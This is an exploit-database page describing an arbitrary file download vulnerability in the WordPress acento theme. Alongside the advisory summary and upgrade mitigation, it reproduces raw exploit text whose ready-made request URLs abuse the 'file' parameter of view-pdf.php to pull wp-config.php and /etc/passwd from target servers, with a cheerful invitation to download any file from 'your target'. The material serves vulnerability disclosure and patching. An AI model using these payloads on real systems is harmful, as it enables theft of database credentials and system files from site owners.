header-logo
Suggest Exploit
vendor:
WordPress acento theme
by:
alieye
7,5
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: WordPress acento theme
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Yes
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

WordPress acento theme Arbitrary File Download Vulnerability

A vulnerability in the WordPress acento theme allows an attacker to download any file from the target server. The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'view-pdf.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to download any file from the target server.

Mitigation:

Upgrade to the latest version of the WordPress acento theme.
Source

Exploit-DB raw data:

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress acento theme Arbitrary File Download Vulnerability
# Author : alieye
# vondor : http://www.wpbyexample.com/detail/acentocultural.com
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Date: 01/09/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target ;)


exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php


Demo:

1-download wp-config.php file from site:

http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php

2-download passwd file from root:

http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd


#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Navigation

Suggest Exploit

Services By CQR